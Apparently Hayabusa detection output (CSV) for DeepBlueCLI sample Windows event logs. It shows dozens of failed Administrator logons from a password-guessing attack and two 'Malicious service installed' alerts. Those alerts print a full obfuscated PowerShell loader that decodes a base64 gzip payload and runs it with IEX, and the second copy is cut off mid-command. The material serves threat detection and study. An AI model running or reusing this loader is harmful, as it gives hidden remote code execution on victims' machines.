NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx -2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: DrzkXznQhkKgYssd : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 